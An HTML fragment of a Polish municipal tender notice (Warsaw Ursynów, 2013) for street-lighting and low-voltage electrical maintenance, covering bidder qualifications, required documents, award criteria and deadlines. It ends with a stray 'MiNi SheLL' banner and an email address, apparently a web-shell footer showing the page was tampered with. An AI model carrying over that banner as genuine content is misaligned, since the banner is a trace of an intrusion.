a)	1 osobą wyznaczoną do wykonywania pracy na stanowisku dozoru w zakresie obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym dla urządzeń, instalacji i sieci elektroenergetycznych w grupie G1, o napięciu nie wyższym niż 1 kV, sieci elektrycznego oświetlenia ulicznego oraz aparatury kontrolno-pomiarowej, urządzeń i instalacji automatycznej regulacji, sterowania i zabezpieczeń wyżej wymienionych urządzeń i instalacji

ORAZ

b)	1 osobą wyznaczoną do wykonywania pracy na stanowisku eksploatacji w zakresie obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym dla urządzeń, instalacji i sieci elektroenergetycznych w grupie G1, o napięciu nie wyższym niż 1 kV, sieci elektrycznego oświetlenia ulicznego oraz aparatury kontrolno-pomiarowej, urządzeń i instalacji automatycznej regulacji, sterowania i zabezpieczeń wyżej wymienionych urządzeń i instalacji

Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu oraz dokumentach wyszczególnionych w pkt III.4.1) Ogłoszenia. Z treści załączonego oświadczenia oraz dokumentu musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu wymienionego w pkt III.4.2 Ogłoszenia, tj. aktualnego odpisu z właściwego rejestru składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w miejscu zamieszkania osoby lub w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
2. W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia - innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wskazać należy, iż w myśl aktualnej linii orzeczniczej (np. wyrok KIO z dnia 18.05.2010 r., sygn. akt. 786/10, wyrok KIO z 14.07.2010 r., sygn. akt 1333/10,  wyrok KIO z dnia 03.09.2010 r., sygn. akt. 1801/10, wyrok KIO z dnia 18.11.2010 r., sygn.akt. 2407/10):
Udowodnienie dysponowania wymienionymi w art. 22 ust. 1 pkt 2) - 4) ustawy Prawo zamówień publicznych zasobami może mieć różną postać oraz treść - stosownie do rodzaju tego zasobu a także stosunku prawnego łączącego wykonawcę z podmiotem udzielającym zasobu jak i charakteru i zakresu porozumienia pomiędzy tymi podmiotami. Udowodnienie to powinno obejmować nie tylko wykazanie faktu udostępnienia niniejszemu Wykonawcy zasobów przez uprawnionego ich dysponenta (podmiot trzeci udzielający odpowiednich zasobów), ale także winno wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia wykonawcy ubiegającemu się o zamówienie odpowiedniego zasobu - wskazywać jego rodzaj, czas udzielenia a także inne istotne okoliczności, w tym, wynikające ze specyfiki tego zasobu. Jeżeli zatem przedmiotem udostępnienia na podstawie art. 26 ust. 2 b ustawy Prawo zamówień publicznych są zasoby takie jak wiedza i doświadczenie wymagane dla realizacji zamówienia, to wskazane zobowiązanie powinno uwzględniać taki właśnie charakter tego zasobu, w tym okoliczność, że nie jest możliwe przeniesienie czy udostępnienie wiedzy lub doświadczenia bez osobistego uczestnictwa podmiotu w realizacji przyszłego zamówienia. Powyższe uczestnictwo, w dowolnej, dozwolonej przez prawo postaci (jako podwykonawca, doradca, czy na innej podstawie) musi jednak zostać wykazane przez Wykonawcę, bowiem nie można przekazać, ani zobowiązać się do udzielenia wiedzy i doświadczenia bez osobistego udziału udzielającego tych zasobów w realizacji zamówienia. W przeciwnym bowiem wypadku, w sytuacji gdy brak w ogóle informacji o zaangażowaniu podmiotu udzielającego doświadczenia w realizacji zamówienia - Zamawiający będzie uprawniony do uznania, że Wykonawca polegający na zasobach innego podmiotu, przedkładający samo tylko zobowiązanie do udostępnienia wiedzy i doświadczenia innego podmiotu bez wskazania uczestnictwa tego podmiotu w wykonaniu zamówienia, nie udowodnił dysponowania odpowiednim zasobem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie:
-Zmiany kadry, tj. osób odpowiedzialnych odpowiednio za: nadzór zamówienia ze strony Wykonawcy,  nadzór ze strony Zamawiającego, w szczególności z powodu zdarzeń losowych, tj. śmierć, choroba, ustanie stosunku pracy, przy czym w odniesieniu osób ze strony Wykonawcy, mają być to osoby posiadające co najmniej kwalifikacje, o których mowa w pkt III.3.4) Ogłoszenia. 
-Zmiany podwykonawcy z powodu zdarzeń, tj. rozwiązanie umowy łączącej go z Wykonawcą, jego likwidacja, nienależyta staranność stwierdzona przez Zamawiającego.
-Zmniejszenia wynagrodzenia z tego powodu, że wykonanie części zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w dniu zawarcia umowy lub z powodu rezygnacji z wykonania części zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ursynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> - osobiście w Urzędzie m. st. Warszawy Dzielnicy Ursynów, 02-777 Warszawa, Al. KEN 61 pok. nr 334..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2013 godzina 12:30, miejsce: SIEDZIBA ZAMAWIAJACEGO PRZY AL. KEN 61, WYDZIAŁ OCHRONY ŚRODOWISKA,  
             POK. NR 530.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com